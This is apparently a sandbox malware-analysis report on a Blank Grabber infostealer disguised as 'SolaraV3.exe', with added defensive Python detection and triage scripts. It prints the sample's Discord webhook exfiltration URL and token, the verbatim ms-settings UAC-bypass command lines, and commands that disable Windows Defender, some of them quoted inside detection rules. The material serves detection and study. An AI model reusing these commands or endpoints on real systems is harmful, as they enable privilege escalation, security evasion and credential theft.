File name: | SolaraV3.exe |
Full analysis: | https://app.any.run/tasks/0af5b7d0-ce94-41db-a356-02d0f662dd2d |
Verdict: | Malicious activity |
Threats: | Blank Grabber is an infostealer written in Python. It is designed to steal a wide array of data, such as browser login credentials, crypto wallets, Telegram sessions, and Discord tokens. It is open-source malware, with its code available on GitHub and regularly receiving updates. The Blank Grabber builder's simple interface lets threat actors with even basic skills deploy it and conduct attacks. |
Analysis date: | September 29, 2024, 23:59:00 |
OS: | Windows 10 Professional (build: 19045, 64 bit) |
Tags: | uac evasion blankgrabber discord stealer exfiltration pyinstaller susp-powershell discordgrabber generic growtopia ims-api upx |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32+ executable (GUI) x86-64, for MS Windows |
MD5: | 031A05DC463314DF4904B6AAB7ABB56D |
SHA1: | D98F758B0126CC2BBFC59D38B23F59EBC8E21C18 |
SHA256: | |
SSDEEP: | 98304:66CwbRk+yQq4ANCz0dz3MCF7mbEelmPuxKS1HmTdozujquT3Jb3n64AMXGYwcnDr:y7/V1ppxy27bT |
ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is, for user acknowledgement. ANY.RUN does not guarantee maliciousness or safety of the content.
MALICIOUS
BlankGrabber has been detected
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 6780)
Bypass User Account Control (Modify registry)
- reg.exe (PID: 5244)
Bypass User Account Control (ComputerDefaults)
- ComputerDefaults.exe (PID: 4668)
Adds path to the Windows Defender exclusion list
- SolaraV3.exe (PID: 2268)
- cmd.exe (PID: 5212)
- cmd.exe (PID: 1964)
Antivirus name has been found in the command line (generic signature)
- cmd.exe (PID: 3916)
- MpCmdRun.exe (PID: 8152)
Windows Defender preferences modified via 'Set-MpPreference'
- cmd.exe (PID: 3916)
Bypass execution policy to execute commands
- powershell.exe (PID: 7248)
Changes powershell execution policy (Bypass)
- cmd.exe (PID: 3812)
GROWTOPIA has been detected (YARA)
- SolaraV3.exe (PID: 2268)
DISCORDGRABBER has been detected (YARA)
- SolaraV3.exe (PID: 2268)
BLANKGRABBER has been detected (SURICATA)
- SolaraV3.exe (PID: 2268)
Stealers network behavior
- SolaraV3.exe (PID: 2268)
Starts CMD.EXE for self-deleting
- SolaraV3.exe (PID: 2268)
SUSPICIOUS
Process drops legitimate windows executable
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 6780)
- SolaraV3.exe (PID: 2268)
Uses WEVTUTIL.EXE to query events from a log or log file
- cmd.exe (PID: 876)
- cmd.exe (PID: 6540)
Starts a Microsoft application from unusual location
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 3332)
- SolaraV3.exe (PID: 6780)
- SolaraV3.exe (PID: 2268)
Uses REG/REGEDIT.EXE to modify registry
- cmd.exe (PID: 6968)
- cmd.exe (PID: 6544)
- cmd.exe (PID: 7096)
The process drops C-runtime libraries
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 6780)
Process drops python dynamic module
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 6780)
Found strings related to reading or modifying Windows Defender settings
- SolaraV3.exe (PID: 3332)
- SolaraV3.exe (PID: 2268)
Application launched itself
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 6780)
Starts CMD.EXE for commands execution
- SolaraV3.exe (PID: 3332)
- SolaraV3.exe (PID: 2268)
Changes default file association
- reg.exe (PID: 5244)
Executable content was dropped or overwritten
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 6780)
- SolaraV3.exe (PID: 2268)
- csc.exe (PID: 8188)
Get information on the list of running processes
- SolaraV3.exe (PID: 2268)
- cmd.exe (PID: 1308)
- cmd.exe (PID: 4892)
- cmd.exe (PID: 1656)
- cmd.exe (PID: 4664)
Script disables Windows Defender's real-time protection
- cmd.exe (PID: 3916)
Script disables Windows Defender's IPS
- cmd.exe (PID: 3916)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 3916)
- cmd.exe (PID: 5212)
- cmd.exe (PID: 1964)
- cmd.exe (PID: 1460)
- cmd.exe (PID: 3812)
- cmd.exe (PID: 1224)
- cmd.exe (PID: 7636)
- cmd.exe (PID: 8028)
- cmd.exe (PID: 7316)
Uses WMIC.EXE to obtain Windows Installer data
- cmd.exe (PID: 6984)
- cmd.exe (PID: 876)
- cmd.exe (PID: 6032)
Uses WMIC.EXE to obtain a list of video controllers
- cmd.exe (PID: 3372)
- cmd.exe (PID: 3972)
- cmd.exe (PID: 6232)
Uses ATTRIB.EXE to modify file attributes
- cmd.exe (PID: 1156)
Script adds exclusion path to Windows Defender
- cmd.exe (PID: 1964)
- cmd.exe (PID: 5212)
Uses NETSH.EXE to obtain data on the network
- cmd.exe (PID: 532)
Starts application with an unusual extension
- cmd.exe (PID: 2064)
- cmd.exe (PID: 7660)
- cmd.exe (PID: 7404)
- cmd.exe (PID: 7776)
- cmd.exe (PID: 8024)
- cmd.exe (PID: 7908)
BASE64 encoded PowerShell command has been detected
- cmd.exe (PID: 3812)
Base64-obfuscated command line is found
- cmd.exe (PID: 3812)
Uses SYSTEMINFO.EXE to read the environment
- cmd.exe (PID: 4008)
The process bypasses the loading of PowerShell profile settings
- cmd.exe (PID: 3812)
CSC.EXE is used to compile C# code
- csc.exe (PID: 8188)
Possible usage of Discord/Telegram API has been detected (YARA)
- SolaraV3.exe (PID: 2268)
Uses WMIC.EXE to obtain operating system information
- cmd.exe (PID: 7840)
The executable file from the user directory is run by the CMD process
- rar.exe (PID: 4068)
Uses WMIC.EXE to obtain computer system information
- cmd.exe (PID: 8008)
Checks for external IP
- svchost.exe (PID: 2256)
- SolaraV3.exe (PID: 2268)
Runs PING.EXE to delay simulation
- cmd.exe (PID: 4560)
Hides command output
- cmd.exe (PID: 4560)
INFO
Create files in a temporary directory
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 3332)
- SolaraV3.exe (PID: 6780)
- SolaraV3.exe (PID: 2268)
Checks supported languages
- SolaraV3.exe (PID: 3332)
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 6780)
- SolaraV3.exe (PID: 2268)
Reads the computer name
- SolaraV3.exe (PID: 2108)
- SolaraV3.exe (PID: 6780)
The process uses the downloaded file
- cmd.exe (PID: 1336)
Reads security settings of Internet Explorer
- ComputerDefaults.exe (PID: 4668)
The Powershell gets current clipboard
- powershell.exe (PID: 1156)
PyInstaller has been detected (YARA)
- SolaraV3.exe (PID: 6780)
- SolaraV3.exe (PID: 2268)
Displays MAC addresses of computer network adapters
- getmac.exe (PID: 2932)
Found Base64 encoded reflection usage via PowerShell (YARA)
- SolaraV3.exe (PID: 2268)
UPX packer has been detected
- SolaraV3.exe (PID: 2268)
Attempting to use instant messaging service
- svchost.exe (PID: 2256)
- SolaraV3.exe (PID: 2268)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report.
ims-api
(PID) Process: (2268) SolaraV3.exe
Discord-Webhook-Tokens (1): 1279610116131389570/5EodVOfV7vKlKvxe2bJjP_IcSs2v5gxj-zDOPmaY9-B6G1xf-_tEZBpZPg9Vt-BnvSXc
Discord-Info-Links: Get Webhook Info: https://discord.com/api/webhooks/1279610116131389570/5EodVOfV7vKlKvxe2bJjP_IcSs2v5gxj-zDOPmaY9-B6G1xf-_tEZBpZPg9Vt-BnvSXc
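Added example, not part of the ANY.RUN report or of the Blank Grabber code: a small Python triage helper for the webhook above. It pulls webhook URLs out of a byte blob (a memory dump of the running stub is the right input, because the dropped blank.aes indicates the payload sits encrypted on disk), splits each into its ID and token, and decodes the creation time from the ID, which is a Discord snowflake whose upper 42 bits are milliseconds since 2015-01-01. The sample blob is constructed; the webhook URL embedded in it is the one this report extracted from PID 2268.

```python
import re
from datetime import datetime, timedelta, timezone

# Discord snowflake epoch: 2015-01-01T00:00:00Z, in milliseconds.
DISCORD_EPOCH_MS = 1_420_070_400_000

# Webhook URL shape: numeric snowflake ID followed by a long urlsafe-base64 token.
WEBHOOK_RE = re.compile(
    r"https?://(?:(?:ptb|canary)\.)?discord(?:app)?\.com/api/webhooks/"
    r"(?P<id>\d{17,20})/(?P<token>[A-Za-z0-9_-]{60,100})"
)

# Webhook URL from the report's "ims-api" section (PID 2268 SolaraV3.exe).
REPORT_WEBHOOK = (
    "https://discord.com/api/webhooks/1279610116131389570/"
    "5EodVOfV7vKlKvxe2bJjP_IcSs2v5gxj-zDOPmaY9-B6G1xf-_tEZBpZPg9Vt-BnvSXc"
)

# Constructed stand-in for a process memory dump: the webhook sits between
# unrelated strings, as it would once the stub has decrypted its config.
SAMPLE_MEMORY = (
    b"\x00\x00python312.dll\x00" + REPORT_WEBHOOK.encode()
    + b"\x00ip-api.com/json/?fields=225545\x00\x00"
)


def snowflake_time(snowflake):
    """Creation time encoded in a Discord snowflake (upper 42 bits = ms since the Discord epoch)."""
    ms = (snowflake >> 22) + DISCORD_EPOCH_MS
    # Integer arithmetic via timedelta avoids float rounding of the epoch value.
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(milliseconds=ms)


def parse_webhook(url):
    """Split a webhook URL into its ID, token and the creation time derived from the ID."""
    m = WEBHOOK_RE.search(url)
    if m is None:
        raise ValueError("not a Discord webhook URL")
    wid = int(m["id"])
    return {
        "id": wid,
        "token": m["token"],
        "created_utc": snowflake_time(wid).strftime("%Y-%m-%dT%H:%M:%SZ"),
        # An unauthenticated GET on this URL returns guild_id, channel_id and name.
        "info_url": m.group(0),
    }


def extract_webhooks(blob):
    """Find every webhook URL in a memory dump or decrypted payload (bytes)."""
    text = blob.decode("latin-1")  # 1:1 byte mapping, nothing is lost or merged
    return [parse_webhook(m.group(0)) for m in WEBHOOK_RE.finditer(text)]


if __name__ == "__main__":
    for hook in extract_webhooks(SAMPLE_MEMORY):
        print(hook["id"], hook["created_utc"], hook["token"][:8] + "...")
```

The creation time is the webhook's, not the sample's: here it lands on 2024-09-01, about two weeks before the PE link timestamp in the EXIF section, which is consistent. The "Get Webhook Info" link in the report is exactly the unauthenticated GET described in the comment. Note also that the HTTP requests table later on this page shows the stub's POST to this URL answered with 404, so the webhook no longer existed (deleted or otherwise invalid) when the analysis ran; a 404 there is a sign the exfiltration channel is dead, not that no data was sent.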
No Malware configuration.
TRiD
Extension | Type | Match (%)
---|---|---
.exe | Win64 Executable (generic) | 87.3
.exe | Generic Win/DOS Executable | 6.3
.exe | DOS Executable Generic | 6.3
EXIF
EXE
Field | Value
---|---
ProductVersion | 10.0.19041.1
ProductName | Microsoft® Windows® Operating System
OriginalFileName | XCOPY.EXE
LegalCopyright | © Microsoft Corporation. All rights reserved.
InternalName | xcopy
FileVersion | 10.0.19041.1 (WinBuild.160101.0800)
FileDescription | Extended Copy Utility
CompanyName | Microsoft Corporation
CharacterSet | Unicode
LanguageCode | English (U.S.)
FileSubtype | -
ObjectFileType | Executable application
FileOS | Windows NT 32-bit
FileFlags | (none)
FileFlagsMask | 0x003f
ProductVersionNumber | 10.0.19041.1
FileVersionNumber | 10.0.19041.1
Subsystem | Windows GUI
SubsystemVersion | 6
ImageVersion | -
OSVersion | 6
EntryPoint | 0xcdb0
UninitializedDataSize | -
InitializedDataSize | 94208
CodeSize | 172032
LinkerVersion | 14.4
PEType | PE32+
ImageFileCharacteristics | Executable, Large address aware
TimeStamp | 2024:09:17 12:22:38+00:00
MachineType | AMD AMD64
The version resource (OriginalFileName XCOPY.EXE, FileDescription "Extended Copy Utility", CompanyName Microsoft Corporation) is copied from Microsoft's xcopy.exe onto what the YARA hits identify as a PyInstaller stub; it is why the process table below lists SolaraV3.exe as a Microsoft "Extended Copy Utility". Version metadata is attacker-controlled and carries no weight in triage, and on a PyInstaller stub the PE TimeStamp may reflect when the bootloader was compiled rather than when this sample was assembled.
No data.
Total processes: 257
Monitored processes: 140
Malicious processes: 8
Suspicious processes: 5
Behavior graph
Process information (the page lists the first 10 of 140 monitored processes)
PID | Command line | Path | Parent process | Integrity | Company / Description
---|---|---|---|---|---
2108 | "C:\Users\admin\Desktop\SolaraV3.exe" | C:\Users\admin\Desktop\SolaraV3.exe | explorer.exe | MEDIUM | Microsoft Corporation / Extended Copy Utility
3332 | "C:\Users\admin\Desktop\SolaraV3.exe" | C:\Users\admin\Desktop\SolaraV3.exe | SolaraV3.exe | MEDIUM | Microsoft Corporation / Extended Copy Utility
6544 | C:\WINDOWS\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\admin\Desktop\SolaraV3.exe" /f" | C:\Windows\System32\cmd.exe | SolaraV3.exe | MEDIUM | Microsoft Corporation / Windows Command Processor
6732 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | cmd.exe | MEDIUM | Microsoft Corporation / Console Window Host
5916 | reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\admin\Desktop\SolaraV3.exe" /f | C:\Windows\System32\reg.exe | cmd.exe | MEDIUM | Microsoft Corporation / Registry Console Tool
6968 | C:\WINDOWS\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f" | C:\Windows\System32\cmd.exe | SolaraV3.exe | MEDIUM | Microsoft Corporation / Windows Command Processor
3360 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | cmd.exe | MEDIUM | Microsoft Corporation / Console Window Host
5244 | reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f | C:\Windows\System32\reg.exe | cmd.exe | MEDIUM | Microsoft Corporation / Registry Console Tool
876 | C:\WINDOWS\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text" | C:\Windows\System32\cmd.exe | SolaraV3.exe | MEDIUM | Microsoft Corporation / Windows Command Processor
400 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | cmd.exe | MEDIUM | Microsoft Corporation / Console Window Host
All rows run as user admin and report file version 10.0.19041.1 (WinBuild.160101.0800).
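The cmd.exe rows above (PIDs 6544, 6968, 876) are the whole ms-settings UAC bypass in command lines: write the default value of HKCU\Software\Classes\ms-settings\shell\open\command to the stub's path, add an empty DelegateExecute value so the shell runs that command instead of the handler's delegate, then launch ComputerDefaults.exe (PID 4668 in the signature list), an auto-elevating binary that Windows starts at high integrity without a prompt for an administrator account with default UAC settings. PID 876 then reads the Windows Defender operational log with wevtutil. Added example, not from the report or from Blank Grabber: a Python detection pass over process-creation records that flags each stage and reports the bypass only when both registry writes precede an auto-elevating launcher. The first three records are the command lines from the table; the ComputerDefaults.exe, Set-MpPreference and Add-MpPreference records are constructed to match the behaviours the signature list attributes to those PIDs (their real command lines are not reproduced on the page), and the last record is benign filler.

```python
import re

# Constructed process-creation records: (pid, image, command line).
# PIDs 6544, 6968 and 876 carry the command lines from the report's process
# table verbatim. PIDs 4668, 3916 and 1964 are constructed stand-ins for the
# behaviours the signature list attributes to those PIDs. PID 9999 is benign.
RECORDS = [
    (6544, "cmd.exe",
     r'C:\WINDOWS\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\admin\Desktop\SolaraV3.exe" /f"'),
    (6968, "cmd.exe",
     r'C:\WINDOWS\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f"'),
    (876, "cmd.exe",
     r'C:\WINDOWS\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"'),
    (4668, "ComputerDefaults.exe", r"C:\Windows\System32\ComputerDefaults.exe"),
    (3916, "cmd.exe",
     r'cmd.exe /c powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"'),
    (1964, "cmd.exe",
     r'cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath C:\Users\admin\Desktop"'),
    (9999, "cmd.exe", r'cmd.exe /c "dir C:\Users\admin"'),
]

# (rule name, pattern matched against "image cmdline", ATT&CK technique)
RULES = [
    ("uac_ms_settings_handler_write",
     re.compile(r"reg(?:\.exe)?\s+add\s+\S*Classes\\ms-settings\\shell\\open\\command", re.I), "T1548.002"),
    ("uac_delegateexecute_write",
     re.compile(r"ms-settings\\shell\\open\\command.*\bDelegateExecute\b", re.I), "T1548.002"),
    ("uac_autoelevate_launcher",
     re.compile(r"(?:ComputerDefaults|fodhelper)\.exe", re.I), "T1548.002"),
    ("defender_eventlog_read",
     re.compile(r'wevtutil\s+qe\s+"?Microsoft-Windows-Windows Defender', re.I), "T1562.001"),
    ("defender_setting_disabled",
     re.compile(r"Set-MpPreference\b.*-Disable\w+", re.I), "T1562.001"),
    ("defender_exclusion_added",
     re.compile(r"Add-MpPreference\b.*-Exclusion(?:Path|Process|Extension)\b", re.I), "T1562.001"),
]

UAC_STAGES = ("uac_ms_settings_handler_write", "uac_delegateexecute_write", "uac_autoelevate_launcher")


def scan(records):
    """Run every rule over each record; return hits as (pid, rule, technique) in record order."""
    hits = []
    for pid, image, cmdline in records:
        haystack = f"{image} {cmdline}"
        for name, pattern, technique in RULES:
            if pattern.search(haystack):
                hits.append((pid, name, technique))
    return hits


def rules_for(hits, pid):
    """Set of rule names that fired for one PID."""
    return {name for p, name, _ in hits if p == pid}


def uac_bypass_chain(hits):
    """Return {stage: pid} when both registry writes are followed by an auto-elevating
    launcher, else None. Order is by record position; with Sysmon/4688 input sort by
    timestamp first. Matching a single stage is not enough: fodhelper/ComputerDefaults
    run legitimately, and the key writes alone are a failed or aborted attempt."""
    first_seen = {}
    for idx, (_, name, _) in enumerate(hits):
        first_seen.setdefault(name, idx)
    if not all(stage in first_seen for stage in UAC_STAGES):
        return None
    launcher_idx = first_seen[UAC_STAGES[2]]
    ordered = first_seen[UAC_STAGES[0]] < launcher_idx and first_seen[UAC_STAGES[1]] < launcher_idx
    if not ordered:
        return None
    return {stage: next(pid for pid, name, _ in hits if name == stage) for stage in UAC_STAGES}


if __name__ == "__main__":
    found = scan(RECORDS)
    for pid, name, technique in found:
        print(f"{pid:>5}  {technique}  {name}")
    print("UAC bypass chain:", uac_bypass_chain(found))
```

Process command lines are the durable evidence here: the modification events further down show reg.exe (PID 6592) deleting the whole ms-settings key after the elevation, so a later check of the live registry finds nothing, whereas the command lines survive in Sysmon Event ID 1 or Security 4688 (with command-line auditing on), and the value writes themselves show up as Sysmon Event ID 13 on \Classes\ms-settings\shell\open\command.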
Total events: 60622
Read events: 60610
Write events: 8
Delete events: 4
Modification events
PID | Process | Key | Operation | Name | Value
---|---|---|---|---|---
5244 | reg.exe | HKEY_CLASSES_ROOT\ms-settings\shell\open\command | write | DelegateExecute | (empty)
4668 | ComputerDefaults.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer | write | SlowContextMenuEntries | 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
4668 | ComputerDefaults.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | write | CachePrefix | (empty)
4668 | ComputerDefaults.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | write | CachePrefix | Cookie:
4668 | ComputerDefaults.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | write | CachePrefix | Visited:
6592 | reg.exe | HKEY_CLASSES_ROOT\ms-settings\shell\open\command | delete key | (default) |
6592 | reg.exe | HKEY_CLASSES_ROOT\ms-settings\shell\open | delete key | (default) |
6592 | reg.exe | HKEY_CLASSES_ROOT\ms-settings\shell | delete key | (default) |
6592 | reg.exe | HKEY_CLASSES_ROOT\ms-settings | delete key | (default) |
2268 | SolaraV3.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib | write | 1280x720x32(BGR 0) | 31,31,31,31
HKEY_CLASSES_ROOT is shown here as the merged view: the key was created under HKCU\Software\Classes\ms-settings by the reg.exe commands in the process table (PIDs 5916 and 5244), which needs no administrative rights, and the four delete-key events from reg.exe (PID 6592) remove it again once ComputerDefaults.exe has been launched, so an after-the-fact check of the live registry will not find it. The CachePrefix writes by ComputerDefaults.exe are ordinary WinINet initialisation noise, and the DrawDib entry is the msvfw32 display-profile cache, a side effect of image or webcam capture code rather than a persistence artifact.
Executable files: 38
Suspicious files: 16
Text files: 56
Unknown types
Dropped files
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\_decimal.pyd | executable | B7012443C9C31FFD3AED70FE89AA82A0 | 3B92D5CA6268A5AD0E92E5E403C621C56B17933DEF9D8C31E69AB520C30930D9
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\VCRUNTIME140.dll | executable | BE8DBE2DC77EBE7F88F910C61AEC691A | 4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\select.pyd | executable | 33722C8CD45091D31AEF81D8A1B72FA8 | 366FCA0B27A34835129086C8CDE1E75C309849E37091DB4ADEDA1BE508F2EE12
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\_ssl.pyd | executable | E33BF2BC6C19BF37C3CC8BAC6843D886 | E3532D3F8C5E54371F827B9E6D0FEE175AD0B2B17E25C26FDFB4EFD5126B7288
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\_ctypes.pyd | executable | FA360B7044312E7404704E1A485876D2 | F06C3491438F6685938789C319731DDF64BA1DA02CD71F43AB8829AF0E3F4E2F
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\_socket.pyd | executable | DA0DC29C413DFB5646D3D0818D875571 | C3365AD1FEE140B4246F06DE805422762358A782757B308F796E302FE0F5AAF8
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\python312.dll | executable | EB02B8268D6EA28DB0EA71BFE24B15D6 | 80222651A93099A906BE55044024D32E93B841C83554359D6E605D50D11E2E70
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\_queue.pyd | executable | 326E66D3CF98D0FA1DB2E4C9F1D73E31 | BF6A8C5872D995EDAB5918491FA8721E7D1B730F66C8404EE760C1E30CB1F40E
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\rar.exe | executable | 9C223575AE5B9544BC3D69AC6364F75E | 90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\blank.aes | binary | A10E5E525212B9C2F73ED543991E8F4F | D44B86328D878BA031E9A9CDE119EC15674FEF1D2B65B2CB3E8ED82ABC05A8DC
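Every dropped file sits under %TEMP%\_MEI21082. PyInstaller's bootloader extracts its bundled archive into a directory named _MEI followed by its own PID and a sequence digit, so the directory name ties the drop to PID 2108 on its own; python312.dll gives the runtime the stub was built against, and blank.aes is the encrypted payload the stub decrypts in memory, which is why the report flags "Process drops python dynamic module" and the PyInstaller YARA rule. Added example, not from the report or from Blank Grabber: a Python triage routine that groups dropped-file rows by process, checks the _MEI directory name against the dropping PID, reads off the Python version, and flags the two files that are not part of a stock PyInstaller bundle (blank.aes, and rar.exe, which the report later shows executing as PID 4068) as Blank Grabber indicators. The input is a constructed list holding a subset of the rows from the table above (SHA256 values omitted).

```python
import re
from collections import defaultdict

# Rows copied from the report's dropped-files table: (pid, process, path, type, md5).
# Constructed as a list here; only a subset of the table is included.
DROPPED = [
    (2108, "SolaraV3.exe", r"C:\Users\admin\AppData\Local\Temp\_MEI21082\_decimal.pyd", "executable", "B7012443C9C31FFD3AED70FE89AA82A0"),
    (2108, "SolaraV3.exe", r"C:\Users\admin\AppData\Local\Temp\_MEI21082\VCRUNTIME140.dll", "executable", "BE8DBE2DC77EBE7F88F910C61AEC691A"),
    (2108, "SolaraV3.exe", r"C:\Users\admin\AppData\Local\Temp\_MEI21082\_ssl.pyd", "executable", "E33BF2BC6C19BF37C3CC8BAC6843D886"),
    (2108, "SolaraV3.exe", r"C:\Users\admin\AppData\Local\Temp\_MEI21082\python312.dll", "executable", "EB02B8268D6EA28DB0EA71BFE24B15D6"),
    (2108, "SolaraV3.exe", r"C:\Users\admin\AppData\Local\Temp\_MEI21082\rar.exe", "executable", "9C223575AE5B9544BC3D69AC6364F75E"),
    (2108, "SolaraV3.exe", r"C:\Users\admin\AppData\Local\Temp\_MEI21082\blank.aes", "binary", "A10E5E525212B9C2F73ED543991E8F4F"),
]

MEI_DIR = re.compile(r"[\\/](_MEI\d+)[\\/]", re.I)
PYTHON_DLL = re.compile(r"python(\d)(\d{1,2})\.dll$", re.I)
# Bundle members that are not part of a stock PyInstaller build; both are named on this page.
GRABBER_FILES = {
    "blank.aes": "encrypted Blank Grabber payload, decrypted in memory by the stub",
    "rar.exe": "bundled archiver, executed later to pack stolen data",
}


def mei_dirs(rows):
    """Map each dropping PID to the set of _MEI extraction directories it wrote."""
    out = defaultdict(set)
    for pid, _, path, _, _ in rows:
        m = MEI_DIR.search(path)
        if m:
            out[pid].add(m.group(1))
    return dict(out)


def mei_matches_pid(dirname, pid):
    """_MEI<pid><seq>: the directory name must start with the bootloader's PID,
    followed only by the collision-avoidance sequence digit(s)."""
    prefix = f"_MEI{pid}"
    rest = dirname[len(prefix):]
    return dirname.upper().startswith(prefix) and rest.isdigit()


def python_version(rows):
    """Runtime version from the bundled pythonXY.dll, e.g. '3.12'."""
    for _, _, path, _, _ in rows:
        m = PYTHON_DLL.search(path)
        if m:
            return f"{m.group(1)}.{m.group(2)}"
    return None


def grabber_indicators(rows):
    """[(filename, md5, why)] for bundle members that point at Blank Grabber."""
    found = []
    for _, _, path, _, md5 in rows:
        name = path.rsplit("\\", 1)[-1].lower()
        if name in GRABBER_FILES:
            found.append((name, md5, GRABBER_FILES[name]))
    return sorted(found)


def triage(rows):
    """One summary dict per dropped-file set."""
    dirs = mei_dirs(rows)
    return {
        "pyinstaller": bool(dirs),
        "mei_dirs": {pid: sorted(d) for pid, d in dirs.items()},
        "mei_pid_consistent": all(mei_matches_pid(d, pid) for pid, ds in dirs.items() for d in ds),
        "python_version": python_version(rows),
        "indicators": grabber_indicators(rows),
    }


if __name__ == "__main__":
    for key, value in triage(DROPPED).items():
        print(f"{key}: {value}")
```

A _MEI directory whose PID prefix does not match the process that created it is worth a second look (a different PyInstaller process, or a decoy directory), which is what the consistency flag is for. The file hashes in the table belong to the unpacked modules and are shared across every PyInstaller build on the same Python release, so only the hashes of blank.aes and of the stub itself identify this particular sample.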
Download PCAP, analyze network streams, HTTP content and a lot more at the full report.
HTTP(S) requests: 5
TCP/UDP connections: 30
DNS requests: 8
Threats
HTTP requests
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | 204 | 142.250.185.67:443 | https://gstatic.com/generate_204 | unknown | — | — | — |
2268 | SolaraV3.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/line/?fields=hosting | unknown | — | — | unknown |
7116 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | unknown |
2268 | SolaraV3.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/json/?fields=225545 | unknown | — | — | unknown |
— | — | POST | 404 | 162.159.128.233:443 | https://discord.com/api/webhooks/1279610116131389570/5EodVOfV7vKlKvxe2bJjP_IcSs2v5gxj-zDOPmaY9-B6G1xf-_tEZBpZPg9Vt-BnvSXc | unknown | binary | 45 b | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report.
Connections
PID | Process | IP | Domain | ASN | CN | Reputation
---|---|---|---|---|---|---
7116 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:138 | — | — | — | whitelisted
— | — | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
3888 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted
7116 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | unknown
7116 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
2268 | SolaraV3.exe | 208.95.112.1:80 | ip-api.com | TUT-AS | US | unknown
2268 | SolaraV3.exe | 172.217.16.131:443 | gstatic.com | — | US | whitelisted
4 | System | 192.168.100.255:137 | — | — | — | whitelisted
2268 | SolaraV3.exe | 162.159.138.232:443 | discord.com | CLOUDFLARENET | — | unknown
DNS requests
Domain | Reputation
---|---
settings-win.data.microsoft.com | whitelisted
google.com | whitelisted
www.microsoft.com | whitelisted
blank-3jsck.in | unknown
ip-api.com | shared
gstatic.com | whitelisted
discord.com | whitelisted
blank-3jsck.in appears only as a DNS lookup; no connection to it is listed above.
Threats
PID | Process | Class | Message |
---|---|---|---|
2256 | svchost.exe | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Check (ip-api .com) |
